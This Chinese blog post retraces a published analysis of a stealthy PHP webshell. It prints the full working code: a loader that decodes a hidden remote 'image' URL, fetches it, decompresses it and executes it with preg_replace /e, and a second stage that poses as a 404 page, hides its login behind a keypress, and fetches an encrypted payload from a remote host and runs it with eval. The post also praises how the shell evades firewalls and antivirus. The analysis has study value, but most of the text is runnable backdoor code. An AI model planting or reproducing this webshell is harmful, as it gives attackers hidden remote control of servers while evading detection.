PHP后门新玩法:一款猥琐的PHP后门分析

2014年3月20日 发表评论 阅读评论

本文是在鲜果订阅里看到来自freebuf站点的内容,而该文的原出处来自于360博客 。虽然本人对php代码的了解挺皮毛,不过感觉该木马的思路非常有意思 。出于围观和膜拜精神,现将该文内容做下摘录,并根据360上分析的步骤操作了一次。

phpwebshell代码如下:

?php
error_reporting(0);
session_start();
header(“Content-type:text/html;charset=utf-8″);if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);
@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION['api']),null);
?>

关键看下面这句代码,

<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649));
?>

这里执行之后其实是一张图片,解密出来的图片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码的。这里执行以下语句来还原出恶意样本代码。不过原作者很警觉也很牛X,等我用360上的方法试的时候,代码解析出的结果已经变了,变成如下:

//<?php
init();
function init()
{
    echo "<p>密码自从被泄露和360公开分析,所以特此升级了一下~</p>
    <p>author:ooooooo.oooo.ooooooo@foxmail.com</p>
    <p>顺便再次鄙视冒充作者的那些无聊人~</p>
    <p>代码完善将会在21 22两日左右~请期待~</p>
    <p>在写作第一版的时候,技术有限,沉余比较多</p>
    <p>第一版已经作废,特此公布第一版源码下载地址</p>
    <p>下载地址:<a href='http://require.duapp.com/v3.rar'>http://require.duapp.com/v3.rar</a></p>
    <p>第二版代码如下</p>
    <p>问我叫什么?暂且叫我小e吧。。或者blackbin</p>
    ";
    echo file_get_contents('http://require.duapp.com/index2.php');
}
// ?>

我按上面的提示去下载源代码时,发现提示403错误,file_get_contents获取的页面也是403禁止访问。源码360博客上也已经做了截图:http://blog.wangzhan.360.cn/wp-content/uploads/2014/03/w1.png ,不过后来我在github上还是找到了该webshell公布的代码,具体可以查看https://github.com/tennc/webshell/tree/master/php/blackbin 

下面继续360上的分析:分析这段代码,发现这是一个伪装的404木马(这里实在是太猥琐了…把页面标题改成404 Not Found),其实整个webshell就一个class外加三个function,代码这里我粘一下吧:

<?php
init();
class Crypt
{
    static function encrypt($str, $key, $toBase64 = false)
    {
        $r = md5(uniqid());
        $c = 0;
        $v = "";
        $len = strlen($str);
        $l = strlen($r);
        for ($i = 0; $i < $len; $i++) {
            if ($c == $l)
                $c = 0;
            $v .= substr($r, $c, 1) . (substr($str, $i, 1) ^ substr($r, $c, 1));
            $c++;
        }
        if ($toBase64) {
            return gzcompress(self::ed($v, $key));
        } else {
            return self::ed($v, $key);
        }
    }
    static function decrypt($str, $key, $toBase64 = false)
    {
        if ($toBase64) {
            $str = self::ed(gzuncompress($str), $key);
        } else {
            $str = self::ed($str, $key);
        }
        $v = "";
        $len = strlen($str);
        for ($i = 0; $i < $len; $i++) {
            $md5 = substr($str, $i, 1);
            $i++;
            $v .= (substr($str, $i, 1) ^ $md5);
        }
        return $v;
    }
    static function ed($str, $key)
    {
        $r = md5($key);
        $c = 0;
        $v = "";
        $len = strlen($str);
        $l = strlen($r);
        for ($i = 0; $i < $len; $i++) {
            if ($c == $l)
                $c = 0;
            $v .= substr($str, $i, 1) ^ substr($r, $c, 1);
            $c++;
        }
        return $v;
    }
}
function init()
{
     //update
     /****
     if (!defined("debug") && filesize($_SERVER["SCRIPT_FILENAME"]) != "371") {
        $name = basename($_SERVER["SCRIPT_FILENAME"]);
        $txt = gzuncompress(_REQUEST(pack('H*',
            '687474703a2f2f323031326865696b652e676f6f676c65636f64652e636f6d2f73766e2f7472756e6b2f6d696e692e686b')));
        if (true == @file_put_contents($name, $txt)) {
            header("location:" . $name);
        }
    }
    ***/
    session_start();
    set_time_limit(0);
    ini_set('memory_limit', -1);
    /***
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {
        header("HTTP/1.1 404 Not Found");
        header("Status: 404 Not Found");
        exit();
    }
    ***/
    $login = <<< HTML
   <!DOCTYPE HTML>
<head>
	<meta http-equiv="content-type" content="text/html" />
	<meta name="author" content="Steve Smith" />
    <meta http-equiv="content-type" charset="UTF-8" />
	<title>404 Not Found</title>
    <style>
    input{font:11px Verdana;BACKGROUND:#FFFFFF;height:18px;border:1px solid #666666;}
    #login{display:none;}
    </style>
</head>
<body>
   <div id="notice" style="position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display: none; font-size:12px;"></div>
   <div id="login">
   <form action="" method="POST">
   <span style="font:11px Verdana;">
       Password:
     </span>
     <input id="pwd" name="pwd" type="password" size="20" />
     <input id="submit" type="button" value="login" />
   </form>
  </div>
<script>
function $(d) {
	return document.getElementById(d)
}
function sideOut(t) {
    if(t==null) t=1500;
	window.setTimeout(display, t);
	function display() {
		$("notice").style.display = "none"
	}
}
$("submit").onclick = function() {
		var pwd = $("pwd").value;
		var options = {};
		options.url = '{self}';
		options.listener = callback;
		options.method = 'POST';
		var request = XmlRequest(options);
		request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
		if (pwd) request.send('pwd=' + pwd);
        else{
            $("notice").style['display']='block';
            $("notice").innerHTML='DATA-ERROR';
            sideOut();
        }
	}
function XmlRequest(options) {
	var req = false;
	if (window.XMLHttpRequest) {
		var req = new XMLHttpRequest()
	} else if (window.ActiveXObject) {
		var req = new window.ActiveXObject('Microsoft.XMLHTTP')
	}
	if (!req) return false;
	req.onreadystatechange = function() {
		if (req.readyState == 4 && req.status == 200) {
			options.listener.call(req)
		}
	};
	req.open(options.method, options.url, true);
	return req
}
function callback() {
	var json = eval("(" + this.responseText + ")");
    if (json.status=='on'){
        window.location.reload();
        return;
    }
	if (json.notice) {
		$("notice").style.display = "block";
		$("notice").innerHTML = json.notice;
        sideOut();
	}
}
document.onkeydown = function(e) {
		    var theEvent = window.event || e;
            var code = theEvent.keyCode || theEvent.which;
			if (80 == code) {
				$("login").style.display = "block"
			}
		}
</script>
</body>
</html>
HTML;
    if ($_POST['pwd'] == true) {
        $true = @gzuncompress(gzuncompress(Crypt::decrypt(pack('H*',
            '789c63d4e5680efdc93c917d65d497f04f219b98cf339d0e3dc01bcb3a23a48a5736808ddd8d5d203094551b0032e00d2c'),
            $_POST['pwd'], true)));
        if ('true' == $true) {
            setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);
            exit('{"status":"on"}');
        } else {
            exit('{"notice":"API-ERROR"}');
        }
    }
    if ($_COOKIE['key'] == true) {
        $true = @gzuncompress(gzuncompress(Crypt::decrypt(pack('H*',
            '789c63d4e5680efdc93c917d65d497f04f219b98cf339d0e3dc01bcb3a23a48a5736808ddd8d5d203094551b0032e00d2c'),
            $_COOKIE['key'], true)));
        if ('true' == $true) {
            if ($_SESSION['code'] == null) {
                $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f636f64652e6a7067'),uniqid()));
            } else {
                $_SESSION['code'] = $_SESSION['code'];
            }
            eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_COOKIE['key'], true))));
        }
    }
    if ($_COOKIE['key'] == null) {
        echo str_replace('{self}', $_SERVER["SCRIPT_NAME"], $login);
        exit();
    }
}
function _Content($fsock = null)
{
    $out = null;
    while ($buff = @fgets($fsock, 2048)) {
        $out .= $buff;
    }
    fclose($fsock);
    $pos = strpos($out, "rnrn");
    $head = substr($out, 0, $pos); //http head
    $status = substr($head, 0, strpos($head, "rn")); //http status line
    $body = substr($out, $pos + 4, strlen($out) - ($pos + 4)); //page body
    if (preg_match("/^HTTP/d.ds([d]+)s.*$/", $status, $matches)) {
        if (intval($matches[1]) / 100 == 2) {
            return $body;
        } else {
            return false;
        }
    } else {
        return false;
    }
}
function _REQUEST($url)
{
    $url2 = parse_url($url);
    $fsock_timeout = 30; //5 second
    if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout)) < 0) {
        return false;
    }
    $request = $url2["path"];
    $in = "GET " . $request . " HTTP/1.1rn";
    $in .= "Accept: */*rn";
    $in .= "User-Agent: E/1.0 EBSDrn";
    $in .= "Host: " . $url2["host"] . "rn";
    $in .= "Connection: Closernrn";
    if (!@fwrite($fsock, $in, strlen($in))) {
        fclose($fsock);
        return false;
    }
    return _Content($fsock);
}
 ?>

而在这段代码有一段关于document.onkeydown = function(e) …… block的js代码,这里它用document.onkeydown获取用户敲击键盘事件,当code等于80的时候显示login这个div,这里查询了一下keyCode的对照表,查到80对应p和P键。所以触发webshell登陆需要按p键(不按P键页面就是一个空白页,看不到登陆框),如图所示:

w4

而在该段代码的开始定义的两个函数encrypt、decrypt两处,可以看出程序用的是对称加密,并且将登陆密码作为加密key 。而init函数部分是对密码进行的一个认证,默认是demo123456,如果输入的结果是这个,则认证成功,否则失败。

而一旦认证成功,其又同前面一样,会请求出一个图片,pack出来的地址是:http://2012heike.googlecode.com/svn/trunk/code.jpg ,同样,最后会使用_REQUEST获取图片内容,解密解压之后再eval,分析之后发现code.jpg中才是真正的webshell经过加密压缩之后的内容,文件内容就是我上面github里列出的code.php里的内容。这个没什么好说的,在360官方blog上也给出了截图 。

最后的总结,同样引用下360站点上的分析总结:这是一个高度隐蔽的webshell,它没有在其代码中用到一些危险函数和敏感字,而是将真正的shell内容经过层层加密处理之后保存到图片当中,丢到服务器上只留下一个url,并且url还是经过加密处理的,所以对外看没有任何特征可寻,过掉了大多数waf以及杀软的查杀。。作者的利用思路新颖,并且前端后端结合紧密,代码精简,各种奇技淫巧,有别于常见的webshell后门,令人佩服!




本站的发展离不开您的资助,金额随意,欢迎来赏!

You can donate through PayPal.
My paypal id: itybku@139.com
Paypal page: https://www.paypal.me/361way

  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.